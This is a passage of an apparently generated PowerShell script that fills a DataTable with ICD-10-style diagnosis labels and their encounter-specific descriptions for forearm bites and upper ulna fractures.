$DiagnosisList.Rows.Add("Open bite of right forearm","Open bite of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right forearm","Open bite of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right forearm","Open bite of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left forearm","Open bite of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left forearm","Open bite of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left forearm","Open bite of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified forearm","Open bite of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified forearm","Open bite of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified forearm","Open bite of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right ulna","Unspecified fracture of upper end of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right ulna","Unspecified fracture of upper end of right ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right ulna","Unspecified fracture of upper end of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right ulna","Unspecified fracture of upper end of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right ulna","Unspecified fracture of upper end of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right ulna","Unspecified fracture of upper end of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right ulna","Unspecified fracture of upper end of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right ulna","Unspecified fracture of upper end of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right ulna","Unspecified fracture of upper end of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right ulna","Unspecified fracture of upper end of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right ulna","Unspecified fracture of upper end of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right ulna","Unspecified fracture of upper end of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right ulna","Unspecified fracture of upper end of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right ulna","Unspecified fracture of upper end of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right ulna","Unspecified fracture of upper end of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right ulna","Unspecified fracture of upper end of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left ulna","Unspecified fracture of upper end of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left ulna","Unspecified fracture of upper end of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left ulna","Unspecified fracture of upper end of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left ulna","Unspecified fracture of upper end of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left ulna","Unspecified fracture of upper end of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left ulna","Unspecified fracture of upper end of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left ulna","Unspecified fracture of upper end of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left ulna","Unspecified fracture of upper end of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left ulna","Unspecified fracture of upper end of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left ulna","Unspecified fracture of upper end of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left ulna","Unspecified fracture of upper end of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left ulna","Unspecified fracture of upper end of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left ulna","Unspecified fracture of upper end of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left ulna","Unspecified fracture of upper end of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left ulna","Unspecified fracture of upper end of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left ulna","Unspecified fracture of upper end of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified ulna","Unspecified fracture of upper end of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified ulna","Unspecified fracture of upper end of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified ulna","Unspecified fracture of upper end of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified ulna","Unspecified fracture of upper end of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified ulna","Unspecified fracture of upper end of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified ulna","Unspecified fracture of upper end of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified ulna","Unspecified fracture of upper end of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified ulna","Unspecified fracture of upper end of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified ulna","Unspecified fracture of upper end of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified ulna","Unspecified fracture of upper end of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified ulna","Unspecified fracture of upper end of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified ulna","Unspecified fracture of upper end of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified ulna","Unspecified fracture of upper end of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified ulna","Unspecified fracture of upper end of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified ulna","Unspecified fracture of upper end of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified ulna","Unspecified fracture of upper end of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right ulna","Torus fracture of upper end of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right ulna","Torus fracture of upper end of right ulna, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right ulna","Torus fracture of upper end of right ulna, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right ulna","Torus fracture of upper end of right ulna, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right ulna","Torus fracture of upper end of right ulna, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right ulna","Torus fracture of upper end of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left ulna","Torus fracture of upper end of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left ulna","Torus fracture of upper end of left ulna, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left ulna","Torus fracture of upper end of left ulna, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left ulna","Torus fracture of upper end of left ulna, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left ulna","Torus fracture of upper end of left ulna, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left ulna","Torus fracture of upper end of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified ulna","Torus fracture of upper end of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified ulna","Torus fracture of upper end of unspecified ulna, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified ulna","Torus fracture of upper end of unspecified ulna, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified ulna","Torus fracture of upper end of unspecified ulna, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified ulna","Torus fracture of upper end of unspecified ulna, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified ulna","Torus fracture of upper end of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of right ulna","Displaced fracture of olecranon process without intraarticular extension of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of right ulna","Displaced fracture of olecranon process without intraarticular extension of right ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of right ulna","Displaced fracture of olecranon process without intraarticular extension of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of right ulna","Displaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of right ulna","Displaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of right ulna","Displaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of right ulna","Displaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of right ulna","Displaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of right ulna","Displaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of right ulna","Displaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of right ulna","Displaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of right ulna","Displaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of right ulna","Displaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of right ulna","Displaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of right ulna","Displaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of right ulna","Displaced fracture of olecranon process without intraarticular extension of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of left ulna","Displaced fracture of olecranon process without intraarticular extension of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of left ulna","Displaced fracture of olecranon process without intraarticular extension of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of left ulna","Displaced fracture of olecranon process without intraarticular extension of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of left ulna","Displaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of left ulna","Displaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of left ulna","Displaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of left ulna","Displaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of left ulna","Displaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of left ulna","Displaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of left ulna","Displaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of left ulna","Displaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of left ulna","Displaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of left ulna","Displaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of left ulna","Displaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of left ulna","Displaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of left ulna","Displaced fracture of olecranon process without intraarticular extension of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of unspecified ulna","Displaced fracture of olecranon process without intraarticular extension of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of unspecified ulna","Displaced fracture of olecranon process without intraarticular extension of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of unspecified ulna","Displaced fracture of olecranon process without intraarticular extension of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of unspecified ulna","Displaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of unspecified ulna","Displaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of unspecified ulna","Displaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of unspecified ulna","Displaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of unspecified ulna","Displaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of unspecified ulna","Displaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of unspecified ulna","Displaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of unspecified ulna","Displaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of unspecified ulna","Displaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of unspecified ulna","Displaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of unspecified ulna","Displaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of unspecified ulna","Displaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of olecranon process without intraarticular extension of unspecified ulna","Displaced fracture of olecranon process without intraarticular extension of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of right ulna","Nondisplaced fracture of olecranon process without intraarticular extension of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of right ulna","Nondisplaced fracture of olecranon process without intraarticular extension of right ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of right ulna","Nondisplaced fracture of olecranon process without intraarticular extension of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of right ulna","Nondisplaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of right ulna","Nondisplaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of right ulna","Nondisplaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of right ulna","Nondisplaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of right ulna","Nondisplaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of right ulna","Nondisplaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of right ulna","Nondisplaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of right ulna","Nondisplaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of right ulna","Nondisplaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of right ulna","Nondisplaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of right ulna","Nondisplaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of right ulna","Nondisplaced fracture of olecranon process without intraarticular extension of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of right ulna","Nondisplaced fracture of olecranon process without intraarticular extension of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of left ulna","Nondisplaced fracture of olecranon process without intraarticular extension of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of left ulna","Nondisplaced fracture of olecranon process without intraarticular extension of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of left ulna","Nondisplaced fracture of olecranon process without intraarticular extension of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of left ulna","Nondisplaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of left ulna","Nondisplaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of left ulna","Nondisplaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of left ulna","Nondisplaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of left ulna","Nondisplaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of left ulna","Nondisplaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of left ulna","Nondisplaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of left ulna","Nondisplaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of left ulna","Nondisplaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of left ulna","Nondisplaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of left ulna","Nondisplaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of left ulna","Nondisplaced fracture of olecranon process without intraarticular extension of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of left ulna","Nondisplaced fracture of olecranon process without intraarticular extension of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of olecranon process without intraarticular extension of unspecified ulna","Nondisplaced fracture of olecranon process without 